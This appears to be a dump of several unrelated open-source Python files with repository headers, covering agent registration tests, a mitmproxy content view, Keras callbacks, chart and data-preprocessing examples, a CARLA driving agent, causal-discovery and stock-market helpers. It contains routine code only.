self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(len(self.aw1_registration_aeas))
assert self.strategy.is_registration_pending is True
# _register_for_aw1
info = self.strategy.registration_info
message = self.get_message_from_outbox()
has_attributes, error_str = self.message_has_attributes(
actual_message=message,
message_type=RegisterMessage,
performative=RegisterMessage.Performative.REGISTER,
to=self.aw1_registration_aea,
sender=self.skill.skill_context.agent_address,
info=info,
)
assert has_attributes, error_str
mock_logger.assert_any_call(
logging.INFO, f"sending registration info: {info}",
)
def test_act_vi(self):
"""Test the act method of the registration behaviour where aw1 agent is NOT in the whitelist."""
# setup
self.strategy.is_ready_to_register = True
self.skill.skill_context.shared_state[
self.shared_storage_key
] = self.aw1_registration_aeas
self.strategy.is_registered = False
self.strategy.is_registration_pending = False
self.strategy._whitelist = []
# operation
with patch.object(self.logger, "log") as mock_logger:
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
assert self.strategy.is_registration_pending is True
mock_logger.assert_any_call(
logging.INFO,
f"agent={self.aw1_registration_aea} not in whitelist={self.strategy._whitelist}",
)
def test_teardown(self):
"""Test the teardown method of the registration behaviour."""
assert self.register_behaviour.teardown() is None
self.assert_quantity_in_outbox(0)
|
mitmproxy/contentviews/auto.py | KarlParkinson/mitmproxy | 24,939 | 31981 | <filename>mitmproxy/contentviews/auto.py
from mitmproxy import contentviews
from . import base
class ViewAuto(base.View):
name = "Auto"
def __call__(self, data, **metadata):
# TODO: The auto view has little justification now that views implement render_priority,
# but we keep it around for now to not touch more parts.
priority, view = max(
(v.render_priority(data, **metadata), v)
for v in contentviews.views
)
if priority == 0 and not data:
return "No content", []
return view(data, **metadata)
def render_priority(self, data: bytes, **metadata) -> float:
return -1 # don't recurse.
|
official/utils/misc/keras_utils.py | baranshad/models | 180 | 32006 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helper functions for the Keras implementations of models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
from tensorflow.python.eager import profiler
class BatchTimestamp(object):
"""A structure to store batch time stamp."""
def __init__(self, batch_index, timestamp):
self.batch_index = batch_index
self.timestamp = timestamp
def __repr__(self):
return "'BatchTimestamp<batch_index: {}, timestamp: {}>'".format(
self.batch_index, self.timestamp)
class TimeHistory(tf.keras.callbacks.Callback):
"""Callback for Keras models."""
def __init__(self, batch_size, log_steps):
"""Callback for logging performance (# examples/second).
Args:
batch_size: Total batch size.
log_steps: Interval of time history logs.
"""
self.batch_size = batch_size
super(TimeHistory, self).__init__()
self.log_steps = log_steps
# Logs start of step 0 then end of each step based on log_steps interval.
self.timestamp_log = []
def on_train_begin(self, logs=None):
self.record_batch = True
def on_train_end(self, logs=None):
self.train_finish_time = time.time()
def on_batch_begin(self, batch, logs=None):
if self.record_batch:
timestamp = time.time()
self.start_time = timestamp
self.record_batch = False
if batch == 0:
self.timestamp_log.append(BatchTimestamp(batch, timestamp))
def on_batch_end(self, batch, logs=None):
if batch % self.log_steps == 0:
timestamp = time.time()
elapsed_time = timestamp - self.start_time
examples_per_second = (self.batch_size * self.log_steps) / elapsed_time
if batch != 0:
self.record_batch = True
self.timestamp_log.append(BatchTimestamp(batch, timestamp))
tf.compat.v1.logging.info(
"BenchmarkMetric: {'num_batches':%d, 'time_taken': %f,"
"'examples_per_second': %f}" %
(batch, elapsed_time, examples_per_second))
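# Illustrative usage sketch (hypothetical names: `model` is a compiled tf.keras model
# and `train_ds` a dataset; neither is defined in this module):
#
#   time_callback = TimeHistory(batch_size=128, log_steps=100)
#   model.fit(train_ds, epochs=2, callbacks=[time_callback])
#   # time_callback.timestamp_log then holds a BatchTimestamp for step 0 and for
#   # every `log_steps`-th step thereafter.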
def get_profiler_callback(model_dir, profile_steps, enable_tensorboard):
"""Validate profile_steps flag value and return profiler callback."""
profile_steps_error_message = (
'profile_steps must be a comma separated pair of positive integers, '
'specifying the first and last steps to be profiled.'
)
try:
profile_steps = [int(i) for i in profile_steps.split(',')]
except ValueError:
raise ValueError(profile_steps_error_message)
if len(profile_steps) != 2:
raise ValueError(profile_steps_error_message)
start_step, stop_step = profile_steps
if start_step < 0 or start_step > stop_step:
raise ValueError(profile_steps_error_message)
if enable_tensorboard:
tf.compat.v1.logging.warn(
'Both TensorBoard and profiler callbacks are used. Note that the '
'TensorBoard callback profiles the 2nd step (unless otherwise '
'specified). Please make sure the steps profiled by the two callbacks '
'do not overlap.')
return ProfilerCallback(model_dir, start_step, stop_step)
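# For example, a flag value such as profile_steps="20,40" (illustrative) would profile
# training steps 20 through 40 and save the profiles under model_dir.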
class ProfilerCallback(tf.keras.callbacks.Callback):
"""Save profiles in specified step range to log directory."""
def __init__(self, log_dir, start_step, stop_step):
super(ProfilerCallback, self).__init__()
self.log_dir = log_dir
self.start_step = start_step
self.stop_step = stop_step
def on_batch_begin(self, batch, logs=None):
if batch == self.start_step:
profiler.start()
tf.compat.v1.logging.info('Profiler started at Step %s', self.start_step)
def on_batch_end(self, batch, logs=None):
if batch == self.stop_step:
results = profiler.stop()
profiler.save(self.log_dir, results)
tf.compat.v1.logging.info(
'Profiler saved profiles for steps between %s and %s to %s',
self.start_step, self.stop_step, self.log_dir)
|
examples/highcharts/pie-donut.py | Jbrunn/python-highcharts | 370 | 32045 | # -*- coding: utf-8 -*-
"""
Highcharts Demos
Donut chart: http://www.highcharts.com/demo/pie-donut
"""
from highcharts import Highchart
H = Highchart(width = 850, height = 400)
data = [{
'y': 55.11,
'color': 'Highcharts.getOptions().colors[0]',
'drilldown': {
'name': 'MSIE versions',
'categories': ['MSIE 6.0', 'MSIE 7.0', 'MSIE 8.0', 'MSIE 9.0'],
'data': [10.85, 7.35, 33.06, 2.81],
'color': 'Highcharts.getOptions().colors[0]'
}
}, {
'y': 21.63,
'color': 'Highcharts.getOptions().colors[1]',
'drilldown': {
'name': 'Firefox versions',
'categories': ['Firefox 2.0', 'Firefox 3.0', 'Firefox 3.5', 'Firefox 3.6', 'Firefox 4.0'],
'data': [0.20, 0.83, 1.58, 13.12, 5.43],
'color': 'Highcharts.getOptions().colors[1]'
}
}, {
'y': 11.94,
'color': 'Highcharts.getOptions().colors[2]',
'drilldown': {
'name': 'Chrome versions',
'categories': ['Chrome 5.0', 'Chrome 6.0', 'Chrome 7.0', 'Chrome 8.0', 'Chrome 9.0',
'Chrome 10.0', 'Chrome 11.0', 'Chrome 12.0'],
'data': [0.12, 0.19, 0.12, 0.36, 0.32, 9.91, 0.50, 0.22],
'color': 'Highcharts.getOptions().colors[2]'
}
}, {
'y': 7.15,
'color': 'Highcharts.getOptions().colors[3]',
'drilldown': {
'name': 'Safari versions',
'categories': ['Safari 5.0', 'Safari 4.0', 'Safari Win 5.0', 'Safari 4.1', 'Safari/Maxthon',
'Safari 3.1', 'Safari 4.1'],
'data': [4.55, 1.42, 0.23, 0.21, 0.20, 0.19, 0.14],
'color': 'Highcharts.getOptions().colors[3]'
}
}, {
'y': 2.14,
'color': 'Highcharts.getOptions().colors[4]',
'drilldown': {
'name': 'Opera versions',
'categories': ['Opera 9.x', 'Opera 10.x', 'Opera 11.x'],
'data': [ 0.12, 0.37, 1.65],
'color': 'Highcharts.getOptions().colors[4]'
}
}]
options = {
'chart': {
'type': 'pie'
},
'title': {
'text': 'Browser market share, April, 2011'
},
'yAxis': {
'title': {
'text': 'Total percent market share'
}
},
'plotOptions': {
'pie': {
'shadow': False,
'center': ['50%', '50%']
}
},
'tooltip': {
'valueSuffix': '%'
},
}
categories = ['MSIE', 'Firefox', 'Chrome', 'Safari', 'Opera']
browserData = []
versionsData = []
for i in range(len(data)):
browserData.append({
'name': categories[i],
'y': data[i]['y'],
'color': data[i]['color']
})
drillDataLen = len(data[i]['drilldown']['data'])
for j in range(drillDataLen):
        brightness = 0.2 - (j / drillDataLen) / 5
versionsData.append({
'name': data[i]['drilldown']['categories'][j],
'y': data[i]['drilldown']['data'][j],
'color': 'Highcharts.Color(' + data[i]['color'] + ').brighten(' + str(brightness) + ').get()'
})
H.set_dict_options(options)
H.add_data_set(browserData, 'pie', 'Browsers', size='60%',
dataLabels={
'formatter': 'function () { \
return this.y > 5 ? this.point.name : null;\
}',
'color': 'white',
'distance': -30
})
H.add_data_set(versionsData, 'pie', 'Versions', size='80%',
innerSize='60%',
dataLabels={
'formatter': "function () {\
return this.y > 1 ? '<b>' + this.point.name + ':</b> ' + this.y + '%' : null;\
}"
})
H.htmlcontent |
Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py | ckamtsikis/cmssw | 852 | 32053 | <reponame>ckamtsikis/cmssw<filename>Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py
import FWCore.ParameterSet.Config as cms
run2_GEM_2017 = cms.Modifier()
|
d4rl/carla/data_collection_agent_lane.py | chappers/d4rl | 552 | 32054 | # !/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
# Modified by <NAME> on 20 April 2020
import argparse
import datetime
import glob
import os
import random
import sys
import time
from PIL import Image
from PIL.PngImagePlugin import PngInfo
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
import math
from dotmap import DotMap
try:
import pygame
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
try:
import queue
except ImportError:
import Queue as queue
from agents.navigation.agent import Agent, AgentState
from agents.navigation.local_planner import LocalPlanner
from agents.navigation.global_route_planner import GlobalRoutePlanner
from agents.tools.misc import is_within_distance_ahead, compute_magnitude_angle
from agents.navigation.global_route_planner_dao import GlobalRoutePlannerDAO
def is_within_distance(target_location, current_location, orientation, max_distance, d_angle_th_up, d_angle_th_low=0):
"""
Check if a target object is within a certain distance from a reference object.
A vehicle in front would be something around 0 deg, while one behind around 180 deg.
:param target_location: location of the target object
:param current_location: location of the reference object
:param orientation: orientation of the reference object
:param max_distance: maximum allowed distance
    :param d_angle_th_up: upper threshold for angle
    :param d_angle_th_low: lower threshold for angle (optional, default is 0)
:return: True if target object is within max_distance ahead of the reference object
"""
target_vector = np.array([target_location.x - current_location.x, target_location.y - current_location.y])
norm_target = np.linalg.norm(target_vector)
# If the vector is too short, we can simply stop here
if norm_target < 0.001:
return True
if norm_target > max_distance:
return False
forward_vector = np.array(
[math.cos(math.radians(orientation)), math.sin(math.radians(orientation))])
d_angle = math.degrees(math.acos(np.clip(np.dot(forward_vector, target_vector) / norm_target, -1., 1.)))
return d_angle_th_low < d_angle < d_angle_th_up
def compute_distance(location_1, location_2):
"""
Euclidean distance between 3D points
:param location_1, location_2: 3D points
"""
x = location_2.x - location_1.x
y = location_2.y - location_1.y
z = location_2.z - location_1.z
norm = np.linalg.norm([x, y, z]) + np.finfo(float).eps
return norm
class CarlaSyncMode(object):
"""
Context manager to synchronize output from different sensors. Synchronous
mode is enabled as long as we are inside this context
with CarlaSyncMode(world, sensors) as sync_mode:
while True:
data = sync_mode.tick(timeout=1.0)
"""
def __init__(self, world, *sensors, **kwargs):
self.world = world
self.sensors = sensors
self.frame = None
self.delta_seconds = 1.0 / kwargs.get('fps', 20)
self._queues = []
self._settings = None
self.start()
def start(self):
self._settings = self.world.get_settings()
self.frame = self.world.apply_settings(carla.WorldSettings(
no_rendering_mode=False,
synchronous_mode=True,
fixed_delta_seconds=self.delta_seconds))
def make_queue(register_event):
q = queue.Queue()
register_event(q.put)
self._queues.append(q)
make_queue(self.world.on_tick)
for sensor in self.sensors:
make_queue(sensor.listen)
def tick(self, timeout):
self.frame = self.world.tick()
data = [self._retrieve_data(q, timeout) for q in self._queues]
assert all(x.frame == self.frame for x in data)
return data
def __exit__(self, *args, **kwargs):
self.world.apply_settings(self._settings)
def _retrieve_data(self, sensor_queue, timeout):
while True:
data = sensor_queue.get(timeout=timeout)
if data.frame == self.frame:
return data
def draw_image(surface, image, blend=False):
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
image_surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if blend:
image_surface.set_alpha(100)
surface.blit(image_surface, (0, 0))
def get_font():
fonts = [x for x in pygame.font.get_fonts()]
default_font = 'ubuntumono'
font = default_font if default_font in fonts else fonts[0]
font = pygame.font.match_font(font)
return pygame.font.Font(font, 14)
def should_quit():
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if event.key == pygame.K_ESCAPE:
return True
return False
def clamp(value, minimum=0.0, maximum=100.0):
return max(minimum, min(value, maximum))
class Sun(object):
def __init__(self, azimuth, altitude):
self.azimuth = azimuth
self.altitude = altitude
self._t = 0.0
def tick(self, delta_seconds):
self._t += 0.008 * delta_seconds
self._t %= 2.0 * math.pi
self.azimuth += 0.25 * delta_seconds
self.azimuth %= 360.0
min_alt, max_alt = [20, 90]
self.altitude = 0.5 * (max_alt + min_alt) + 0.5 * (max_alt - min_alt) * math.cos(self._t)
def __str__(self):
return 'Sun(alt: %.2f, azm: %.2f)' % (self.altitude, self.azimuth)
class Storm(object):
def __init__(self, precipitation):
self._t = precipitation if precipitation > 0.0 else -50.0
self._increasing = True
self.clouds = 0.0
self.rain = 0.0
self.wetness = 0.0
self.puddles = 0.0
self.wind = 0.0
self.fog = 0.0
def tick(self, delta_seconds):
delta = (1.3 if self._increasing else -1.3) * delta_seconds
self._t = clamp(delta + self._t, -250.0, 100.0)
        self.clouds = clamp(self._t + 40.0, 0.0, 60.0)
self.rain = clamp(self._t, 0.0, 80.0)
delay = -10.0 if self._increasing else 90.0
self.puddles = clamp(self._t + delay, 0.0, 85.0)
self.wetness = clamp(self._t * 5, 0.0, 100.0)
self.wind = 5.0 if self.clouds <= 20 else 90 if self.clouds >= 70 else 40
self.fog = clamp(self._t - 10, 0.0, 30.0)
if self._t == -250.0:
self._increasing = True
if self._t == 100.0:
self._increasing = False
def __str__(self):
return 'Storm(clouds=%d%%, rain=%d%%, wind=%d%%)' % (self.clouds, self.rain, self.wind)
class Weather(object):
def __init__(self, world, changing_weather_speed):
self.world = world
self.reset()
self.weather = world.get_weather()
self.changing_weather_speed = changing_weather_speed
self._sun = Sun(self.weather.sun_azimuth_angle, self.weather.sun_altitude_angle)
self._storm = Storm(self.weather.precipitation)
def reset(self):
weather_params = carla.WeatherParameters(sun_altitude_angle=90.)
self.world.set_weather(weather_params)
def tick(self):
self._sun.tick(self.changing_weather_speed)
self._storm.tick(self.changing_weather_speed)
self.weather.cloudiness = self._storm.clouds
self.weather.precipitation = self._storm.rain
self.weather.precipitation_deposits = self._storm.puddles
self.weather.wind_intensity = self._storm.wind
self.weather.fog_density = self._storm.fog
self.weather.wetness = self._storm.wetness
self.weather.sun_azimuth_angle = self._sun.azimuth
self.weather.sun_altitude_angle = self._sun.altitude
self.world.set_weather(self.weather)
def __str__(self):
return '%s %s' % (self._sun, self._storm)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--vision_size', type=int, default=84)
parser.add_argument('--vision_fov', type=int, default=90)
parser.add_argument('--weather', default=False, action='store_true')
    parser.add_argument('--frame_skip', type=int, default=1)
    parser.add_argument('--steps', type=int, default=100000)
    parser.add_argument('--multiagent', default=False, action='store_true')
parser.add_argument('--lane', type=int, default=0)
parser.add_argument('--lights', default=False, action='store_true')
args = parser.parse_args()
return args
class LocalPlannerModified(LocalPlanner):
def __del__(self):
pass # otherwise it deletes our vehicle object
def run_step(self):
return super().run_step(debug=False) # otherwise by default shows waypoints, that interfere with our camera
class RoamingAgent(Agent):
"""
RoamingAgent implements a basic agent that navigates scenes making random
choices when facing an intersection.
This agent respects traffic lights and other vehicles.
NOTE: need to re-create after each env reset
"""
def __init__(self, env):
"""
:param vehicle: actor to apply to local planner logic onto
"""
vehicle = env.vehicle
follow_traffic_lights = env.follow_traffic_lights
super(RoamingAgent, self).__init__(vehicle)
self._proximity_threshold = 10.0 # meters
self._state = AgentState.NAVIGATING
self._local_planner = LocalPlannerModified(self._vehicle)
self._follow_traffic_lights = follow_traffic_lights
def compute_action(self):
action, traffic_light = self.run_step()
throttle = action.throttle
brake = action.brake
steer = action.steer
#print('tbsl:', throttle, brake, steer, traffic_light)
if brake == 0.0:
return np.array([throttle, steer])
else:
return np.array([-brake, steer])
def run_step(self):
"""
Execute one step of navigation.
:return: carla.VehicleControl
"""
# is there an obstacle in front of us?
hazard_detected = False
# retrieve relevant elements for safe navigation, i.e.: traffic lights and other vehicles
actor_list = self._world.get_actors()
vehicle_list = actor_list.filter("*vehicle*")
lights_list = actor_list.filter("*traffic_light*")
# check possible obstacles
vehicle_state, vehicle = self._is_vehicle_hazard(vehicle_list)
if vehicle_state:
self._state = AgentState.BLOCKED_BY_VEHICLE
hazard_detected = True
# check for the state of the traffic lights
traffic_light_color = self._is_light_red(lights_list)
if traffic_light_color == 'RED' and self._follow_traffic_lights:
self._state = AgentState.BLOCKED_RED_LIGHT
hazard_detected = True
if hazard_detected:
control = self.emergency_stop()
else:
self._state = AgentState.NAVIGATING
# standard local planner behavior
control = self._local_planner.run_step()
#print ('Action chosen: ', control)
return control, traffic_light_color
# override case class
def _is_light_red_europe_style(self, lights_list):
"""
This method is specialized to check European style traffic lights.
Only suitable for Towns 03 -- 07.
"""
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
traffic_light_color = "NONE" # default, if no traffic lights are seen
for traffic_light in lights_list:
object_waypoint = self._map.get_waypoint(traffic_light.get_location())
if object_waypoint.road_id != ego_vehicle_waypoint.road_id or \
object_waypoint.lane_id != ego_vehicle_waypoint.lane_id:
continue
if is_within_distance_ahead(traffic_light.get_transform(),
self._vehicle.get_transform(),
self._proximity_threshold):
if traffic_light.state == carla.TrafficLightState.Red:
return "RED"
elif traffic_light.state == carla.TrafficLightState.Yellow:
traffic_light_color = "YELLOW"
elif traffic_light.state == carla.TrafficLightState.Green:
                    if traffic_light_color != "YELLOW": # (more severe)
traffic_light_color = "GREEN"
else:
import pdb; pdb.set_trace()
# investigate https://carla.readthedocs.io/en/latest/python_api/#carlatrafficlightstate
return traffic_light_color
# override case class
def _is_light_red_us_style(self, lights_list, debug=False):
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
traffic_light_color = "NONE" # default, if no traffic lights are seen
if ego_vehicle_waypoint.is_junction:
# It is too late. Do not block the intersection! Keep going!
return "JUNCTION"
if self._local_planner.target_waypoint is not None:
if self._local_planner.target_waypoint.is_junction:
min_angle = 180.0
sel_magnitude = 0.0
sel_traffic_light = None
for traffic_light in lights_list:
loc = traffic_light.get_location()
magnitude, angle = compute_magnitude_angle(loc,
ego_vehicle_location,
self._vehicle.get_transform().rotation.yaw)
if magnitude < 60.0 and angle < min(25.0, min_angle):
sel_magnitude = magnitude
sel_traffic_light = traffic_light
min_angle = angle
if sel_traffic_light is not None:
if debug:
print('=== Magnitude = {} | Angle = {} | ID = {}'.format(
sel_magnitude, min_angle, sel_traffic_light.id))
if self._last_traffic_light is None:
self._last_traffic_light = sel_traffic_light
if self._last_traffic_light.state == carla.TrafficLightState.Red:
return "RED"
elif self._last_traffic_light.state == carla.TrafficLightState.Yellow:
traffic_light_color = "YELLOW"
elif self._last_traffic_light.state == carla.TrafficLightState.Green:
                        if traffic_light_color != "YELLOW": # (more severe)
traffic_light_color = "GREEN"
else:
import pdb; pdb.set_trace()
# investigate https://carla.readthedocs.io/en/latest/python_api/#carlatrafficlightstate
else:
self._last_traffic_light = None
return traffic_light_color
if __name__ == '__main__':
# example call:
# ./PythonAPI/util/config.py --map Town01 --delta-seconds 0.05
# python PythonAPI/carla/agents/navigation/data_collection_agent.py --vision_size 256 --vision_fov 90 --steps 10000 --weather --lights
args = parse_args()
env = CarlaEnv(args)
try:
done = False
while not done:
action, traffic_light_color = env.compute_action()
next_obs, reward, done, info = env.step(action, traffic_light_color)
print ('Reward: ', reward, 'Done: ', done, 'Location: ', env.vehicle.get_location())
if done:
# env.reset_init()
# env.reset()
done = False
finally:
env.finish()
|
applications/tensorflow2/image_classification/data/data_transformer.py | payoto/graphcore_examples | 260 | 32084 | <reponame>payoto/graphcore_examples
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
import tensorflow as tf
from tensorflow.python.ops import math_ops
import logging
from . import imagenet_processing
from custom_exceptions import UnsupportedFormat, DimensionError
class DataTransformer:
logger = logging.getLogger('data_transformer')
@staticmethod
def normalization(ds, scale=1 / 255.0, img_type=tf.float32):
# Applying normalization before `ds.cache()` to re-use it.
# Note: Random transformations (e.g. images augmentations) should be applied
# after both `ds.cache()` (to avoid caching randomness) and `ds.batch()`
# (for vectorization https://www.tensorflow.org/guide/data_performance#vectorizing_mapping).
if not isinstance(ds, tf.data.Dataset):
raise UnsupportedFormat(
f'Type of ds is not the one expected (tf.data.Dataset) {type(ds)}')
if not hasattr(
ds.element_spec, '__len__') or len(ds.element_spec) != 2:
raise DimensionError(
f'Data dimension is not the one supported (2) {ds.element_spec}')
multiplier = tf.cast(scale, img_type)
return ds.map(lambda x,
y: (multiplier * tf.cast(x, img_type), tf.cast(y, tf.int32)),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
@staticmethod
def cache_shuffle(ds: tf.data.Dataset, buffer_size: int = 1, shuffle: bool = True, seed: int = 42):
if not isinstance(ds, tf.data.Dataset):
raise UnsupportedFormat(
f'Type of ds is not the one expected (tf.data.Dataset) {type(ds)}')
ds = ds.cache()
if shuffle:
ds = ds.shuffle(buffer_size, seed=seed)
return ds
@staticmethod
def cifar_preprocess(ds,
buffer_size,
img_type=tf.float32,
is_training=True,
accelerator_side_preprocess=False,
pipeline_num_parallel=48,
seed=42):
if not isinstance(ds, tf.data.Dataset):
raise UnsupportedFormat(
f'Type of ds is not the one expected (tf.data.Dataset) {type(ds)}')
if not hasattr(
ds.element_spec, '__len__') or len(ds.element_spec) != 2:
raise DimensionError(
f'Data dimension is not the one supported (2) {ds.element_spec}')
ds = DataTransformer.cache_shuffle(ds, buffer_size, is_training, seed)
preprocess_fn = cifar_preprocess_training_fn if is_training else cifar_preprocess_inference_fn
if accelerator_side_preprocess:
host_side_preprocess_fn = None
accelerator_side_preprocess_fn = preprocess_fn
else:
host_side_preprocess_fn = preprocess_fn
accelerator_side_preprocess_fn = None
def cifar_preprocess_map_func(x_image):
assert(x_image.shape == (32, 32, 3))
if host_side_preprocess_fn is not None:
x_image = tf.cast(x_image, tf.float32)
x_image = host_side_preprocess_fn(x_image)
x_image = tf.cast(x_image, img_type)
if is_training:
shape = x_image.get_shape().as_list()
padding = 4
x_image = tf.pad(x_image, [[padding, padding], [padding, padding], [0, 0]], "CONSTANT")
x_image = tf.image.random_crop(x_image, shape, seed=seed)
return x_image
ds = ds.map(lambda x, y: (cifar_preprocess_map_func(x), tf.cast(y, tf.int32)),
num_parallel_calls=pipeline_num_parallel)
accelerator_side_preprocess_fn = preprocess_fn if accelerator_side_preprocess is True else None
return ds, accelerator_side_preprocess_fn
@staticmethod
def imagenet_preprocessing(ds,
img_type,
is_training,
accelerator_side_preprocess=True,
pipeline_num_parallel=48,
seed=None):
preprocessing_fn = imagenet_preprocess_training_fn if is_training else imagenet_preprocess_inference_fn
if accelerator_side_preprocess:
host_side_preprocess_fn = None
accelerator_side_preprocess_fn = preprocessing_fn
else:
host_side_preprocess_fn = preprocessing_fn
accelerator_side_preprocess_fn = None
def processing_fn(raw_record): return imagenet_processing.parse_record(
raw_record, is_training, img_type, host_side_preprocess_fn, seed=seed)
return ds.map(processing_fn, num_parallel_calls=pipeline_num_parallel), accelerator_side_preprocess_fn
def _image_normalisation(image, mean, std, scale=255):
mean = tf.cast(mean, dtype=image.dtype)
std = tf.cast(std, dtype=image.dtype)
mean = tf.broadcast_to(mean, tf.shape(image))
std = tf.broadcast_to(std, tf.shape(image))
return (image / scale - mean) / std
def _imagenet_normalize(image):
IMAGENET_NORMALISATION_MEAN = [0.485, 0.456, 0.406]
IMAGENET_NORMALISATION_STD = [0.229, 0.224, 0.225]
return _image_normalisation(image,
IMAGENET_NORMALISATION_MEAN,
IMAGENET_NORMALISATION_STD)
def _cifar_normalize(image):
mean = math_ops.reduce_mean(image, axis=[-1, -2, -3], keepdims=True)
std = math_ops.reduce_std(image, axis=[-1, -2, -3], keepdims=True)
return _image_normalisation(image, mean, std, scale=1)
def imagenet_preprocess_training_fn(image):
return _imagenet_normalize(image)
def imagenet_preprocess_inference_fn(image):
return _imagenet_normalize(image)
def cifar_preprocess_training_fn(image):
image = tf.image.random_flip_left_right(image)
return _cifar_normalize(image)
def cifar_preprocess_inference_fn(image):
return _cifar_normalize(image)
|
dowhy/graph_learner.py | leo-ware/dowhy | 2,904 | 32101 | class GraphLearner:
"""Base class for causal discovery methods.
Subclasses implement different discovery methods. All discovery methods are in the package "dowhy.causal_discoverers"
"""
def __init__(self, data, library_class, *args, **kwargs):
self._data = data
self._labels = list(self._data.columns)
self._adjacency_matrix = None
self._graph_dot = None
def learn_graph(self):
'''
Discover causal graph and the graph in DOT format.
'''
raise NotImplementedError
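# Minimal illustrative subclass sketch (hypothetical; not one of dowhy's built-in
# discovery methods). It thresholds absolute pairwise correlations to build an
# adjacency matrix, assuming self._data is a pandas DataFrame as the constructor implies.
class _ExampleThresholdLearner(GraphLearner):
    def learn_graph(self, threshold=0.5):
        # Correlation-based skeleton: put an edge wherever |corr| exceeds the threshold.
        corr = self._data.corr().abs().values
        self._adjacency_matrix = (corr > threshold).astype(int)
        return self._adjacency_matrix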
|
easytrader/utils/stock.py | chforest/easytrader | 6,829 | 32103 | <filename>easytrader/utils/stock.py
# coding:utf-8
import datetime
import json
import random
import requests
def get_stock_type(stock_code):
    """Determine which securities market (exchange) a stock code belongs to.
    Matching rules:
    codes starting with ['50', '51', '60', '90', '110'] -> sh
    codes starting with ['00', '13', '18', '15', '16', '18', '20', '30', '39', '115'] -> sz
    otherwise codes starting with ['5', '6', '9'] -> sh, everything else -> sz
    :param stock_code: stock code; if it starts with 'sz' or 'sh' that prefix is returned directly, otherwise the built-in rules above are applied
    :return 'sh' or 'sz'"""
stock_code = str(stock_code)
if stock_code.startswith(("sh", "sz")):
return stock_code[:2]
if stock_code.startswith(
("50", "51", "60", "73", "90", "110", "113", "132", "204", "78")
):
return "sh"
if stock_code.startswith(
("00", "13", "18", "15", "16", "18", "20", "30", "39", "115", "1318")
):
return "sz"
if stock_code.startswith(("5", "6", "9")):
return "sh"
return "sz"
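# Illustrative examples following the rules above:
#   get_stock_type("601398") -> "sh" (starts with "60")
#   get_stock_type("000001") -> "sz" (starts with "00")
#   get_stock_type("sz300750") -> "sz" (an explicit "sz"/"sh" prefix is returned directly)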
def get_30_date():
"""
    Return the default dates used for queries: today's date and the date 30 days ago.
    Dates used for queries are usually formatted like 20160211.
:return:
"""
now = datetime.datetime.now()
end_date = now.date()
start_date = end_date - datetime.timedelta(days=30)
return start_date.strftime("%Y%m%d"), end_date.strftime("%Y%m%d")
def get_today_ipo_data():
"""
    Query the new (IPO) stocks that are open for subscription today.
    :return: list of today's subscribable IPO stocks; apply_code is the subscription code, price is the issue price
"""
agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
send_headers = {
"Host": "xueqiu.com",
"User-Agent": agent,
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "deflate",
"Cache-Control": "no-cache",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://xueqiu.com/hq",
"Connection": "keep-alive",
}
timestamp = random.randint(1000000000000, 9999999999999)
home_page_url = "https://xueqiu.com"
ipo_data_url = (
"https://xueqiu.com/proipo/query.json?column=symbol,name,onl_subcode,onl_subbegdate,actissqty,onl"
"_actissqty,onl_submaxqty,iss_price,onl_lotwiner_stpub_date,onl_lotwinrt,onl_lotwin_amount,stock_"
"income&orderBy=onl_subbegdate&order=desc&stockType=&page=1&size=30&_=%s"
% (str(timestamp))
)
session = requests.session()
    session.get(home_page_url, headers=send_headers) # obtain session cookies
ipo_response = session.post(ipo_data_url, headers=send_headers)
json_data = json.loads(ipo_response.text)
today_ipo = []
for line in json_data["data"]:
if datetime.datetime.now().strftime("%a %b %d") == line[3][:10]:
today_ipo.append(
{
"stock_code": line[0],
"stock_name": line[1],
"apply_code": line[2],
"price": line[7],
}
)
return today_ipo
|
matplotlib_venn/_venn2.py | TRuikes/matplotlib-venn | 306 | 32134 | <gh_stars>100-1000
'''
Venn diagram plotting routines.
Two-circle venn plotter.
Copyright 2012, <NAME>.
http://kt.era.ee/
Licensed under MIT license.
'''
# Make sure we don't try to do GUI stuff when running tests
import sys, os
if 'py.test' in os.path.basename(sys.argv[0]): # (XXX: Ugly hack)
import matplotlib
matplotlib.use('Agg')
import numpy as np
import warnings
from collections import Counter
from matplotlib.patches import Circle
from matplotlib.colors import ColorConverter
from matplotlib.pyplot import gca
